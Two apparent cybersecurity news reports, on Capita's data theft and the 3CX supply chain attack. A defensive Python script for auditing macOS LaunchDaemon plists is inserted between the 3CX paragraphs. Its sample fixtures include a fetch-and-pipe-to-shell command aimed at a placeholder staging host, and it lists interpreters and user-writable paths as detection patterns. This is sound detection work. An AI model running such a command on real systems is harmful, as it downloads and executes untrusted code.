Capita Admits Data Theft in Recent Cyberattack by Hackers

  • Written by Ari Denial, Cybersecurity & Tech Writer

UK outsourcing company Capita has disclosed that customer data may have been stolen during a cyberattack in March.

The firm, which provides services to the NHS and the UK government, confirmed that its investigation had found indications of “limited data exfiltration”, possibly affecting customers, suppliers or staff. It has not said what kind of data was taken or how many people may be affected.

Reports suggest, however, that the Black Basta ransomware group, which claimed responsibility for the attack, has published personal data including bank account details and passport photos, as well as data belonging to teachers applying for jobs at schools.

The Black Basta ransomware group, believed to have targeted UK outsourcing firm Capita in a cyber attack last month, is also said to have targeted US satellite television provider Dish. Capita initially reported an “IT issue” before later admitting a “cyber incident” had caused disruption.

Although the company initially said it had no evidence of data theft, it later confirmed limited data exfiltration. The attack also disrupted some services Capita provides to clients, including Barnet Council and O2. As yet, Capita is not featured on Black Basta’s dark web leak site.

UK government services faced minimal disruption from the attack, according to Conor Walsh, a spokesperson for the Cabinet Office. Capita holds public sector contracts worth £6.5bn ($8bn). The company, which says it has now restored most of the affected client services, revealed that the attackers first gained access to its internal systems on 22 March and that the intrusion was interrupted on 31 March. Staff access to Microsoft 365 has also been reinstated.

Capita has also revealed that around 4% of its server estate may have been affected by a cyber attack that occurred in March. The company added that it is continuing forensic investigations and will notify affected customers, suppliers or staff in a timely manner. The Information Commissioner’s Office confirmed that it is assessing information provided by Capita.

Supply Chain Attack Blamed for Triggering 3CX Breach, Thousands of User Accounts Compromised

  • Written by Ari Denial, Cybersecurity & Tech Writer

According to cybersecurity company Mandiant, the recent 3CX supply chain attack, which abused the company’s popular voice over IP (VoIP) software, was itself triggered by an earlier supply chain attack against Trading Technologies’ futures trading software.

The researchers suspect that the attackers distributed malware through Trading Technologies’ software to pave the way for the 3CX attack. The initial attack allowed the perpetrators to spread a malicious payload through 3CX and compromise thousands of user accounts.

Mandiant, which assisted 3CX in its investigation of the attack, found that the malicious installer for Trading Technologies’ X_TRADER software deployed a multi-stage modular backdoor named VEILEDSIGNAL.

The backdoor was designed to execute shellcode, inject a communication module into web browsers like Chrome, Firefox, or Edge, and terminate itself. Mandiant discovered that the attackers, tracked as UNC4736, stole corporate credentials from an employee’s personal computer and used them to move laterally through 3CX’s network, eventually breaching both the Windows and macOS build environments.

The attackers then deployed the TAXHAUL launcher and COLDCAT downloader on the Windows build environment. TAXHAUL persisted through DLL hijacking of the IKEEXT service, so it was loaded with LocalSystem privileges whenever that service started.

Mandiant also found that the macOS build server was compromised with the POOLRAT backdoor, which persisted through a LaunchDaemon; the DLL hijacking technique applies only to the Windows build server. The malware gave the attackers remote access to all compromised devices over the internet. Mandiant has additionally associated UNC4736 with two suspected APT43 activity clusters, UNC3782 and UNC4469.
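Persistence through a LaunchDaemon, as described above for POOLRAT, leaves a property list on disk that a defender can audit. The following is an added example written for this page, not code from 3CX, Mandiant or the article: a Python audit of LaunchDaemon plists that flags jobs whose program lives in a user-writable or hidden location, or that pass a script to an interpreter. The sample plists, labels and paths in it are constructed and hypothetical; on a live macOS host you would call audit_directory on /Library/LaunchDaemons.

```python
"""Audit launchd daemon property lists for persistence indicators.

Added example for this page (not code from 3CX, Mandiant or the article).
It parses LaunchDaemon plists and flags jobs whose program lives in a
user-writable or hidden location, or that hand a script to an interpreter.
The sample plists below are constructed here; every label and path in them
is hypothetical. On a live host, call audit_directory("/Library/LaunchDaemons").
"""
import plistlib
from pathlib import Path, PurePosixPath
from typing import Dict, List, Optional

# Where a daemon's program is normally installed. Anything else gets flagged.
EXPECTED_PREFIXES = ("/System/", "/usr/", "/Library/", "/Applications/",
                     "/opt/", "/bin/", "/sbin/")
# Locations an unprivileged user can write to; a root daemon has no business here.
USER_WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/",
                          "/Users/", "/var/folders/", "/private/var/folders/",
                          "/Library/Caches/")
# Binaries that make the plist itself carry the payload (script in ProgramArguments).
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript", "curl"}


def program_path(job: dict) -> Optional[str]:
    """launchd runs Program if present, otherwise ProgramArguments[0]."""
    if isinstance(job.get("Program"), str):
        return job["Program"]
    args = job.get("ProgramArguments")
    if isinstance(args, list) and args and isinstance(args[0], str):
        return args[0]
    return None


def audit_job(job: dict) -> List[str]:
    """Return a list of findings for one parsed launchd job; empty means nothing odd."""
    findings: List[str] = []
    prog = program_path(job)
    if prog is None:
        return ["no Program or ProgramArguments"]
    if prog.startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"program in user-writable location: {prog}")
    elif not prog.startswith(EXPECTED_PREFIXES):
        findings.append(f"program outside expected install locations: {prog}")
    if any(part.startswith(".") for part in PurePosixPath(prog).parts):
        findings.append(f"hidden path component: {prog}")
    if PurePosixPath(prog).name in INTERPRETERS:
        findings.append("job runs an interpreter: " + " ".join(job.get("ProgramArguments", [])))
    # A daemon that starts at boot and is respawned when killed is persistence by
    # design; only worth noting once something else about the job looks off.
    if findings and job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("starts at boot and is respawned if killed (RunAtLoad + KeepAlive)")
    return findings


def audit_plist(data: bytes) -> List[str]:
    """Parse raw plist bytes (XML or binary) and audit the job they describe."""
    try:
        job = plistlib.loads(data)
    except Exception as exc:  # malformed, or not a plist at all
        return [f"unparseable plist: {exc}"]
    if not isinstance(job, dict):
        return ["top-level object is not a dictionary"]
    return audit_job(job)


def audit_directory(directory: str) -> Dict[str, List[str]]:
    """Audit every *.plist in a directory; returns only the files with findings."""
    results: Dict[str, List[str]] = {}
    for path in sorted(Path(directory).glob("*.plist")):
        findings = audit_plist(path.read_bytes())
        if findings:
            results[path.name] = findings
    return results


# Constructed sample jobs (hypothetical labels and paths), serialised to XML plists
# so the audit exercises the same parser it would use on real files.
SAMPLE_PLISTS: Dict[str, bytes] = {
    "com.example.updater.plist": plistlib.dumps({
        "Label": "com.example.updater",
        "Program": "/Library/Application Support/Example/updater",
        "RunAtLoad": True,
    }),
    "com.example.sysmon.plist": plistlib.dumps({
        "Label": "com.example.sysmon",
        "ProgramArguments": ["/Users/Shared/.cache/svc", "-d"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "com.example.stager.plist": plistlib.dumps({
        "Label": "com.example.stager",
        "ProgramArguments": ["/bin/sh", "-c",
                             "curl -fsSL http://stage.example.invalid/x | sh"],
        "RunAtLoad": True,
    }),
    "broken.plist": b"not a property list",
}


def audit_samples() -> Dict[str, List[str]]:
    """Run the audit over the constructed samples; files with no findings are omitted."""
    results: Dict[str, List[str]] = {}
    for name, data in SAMPLE_PLISTS.items():
        findings = audit_plist(data)
        if findings:
            results[name] = findings
    return results


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(name)
        for finding in findings:
            print("   ", finding)
```

The script only reasons about what the plist says; it does not verify that the program it points to is signed or still on disk. On a real host, follow up anything it flags with `codesign -dv` on the program and compare against what `launchctl print system` reports as loaded, since a plist on disk and a running job are two different facts.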

3CX Phone System, which has over 12 million daily users and is used by more than 600,000 businesses worldwide, including McDonald’s, Coca-Cola and American Express, was compromised in the supply chain attack, according to Mandiant.

Mandiant said this was the first time it had seen one software supply chain compromise lead to another, demonstrating the reach such attacks can have when a threat actor is able to chain one intrusion into the next.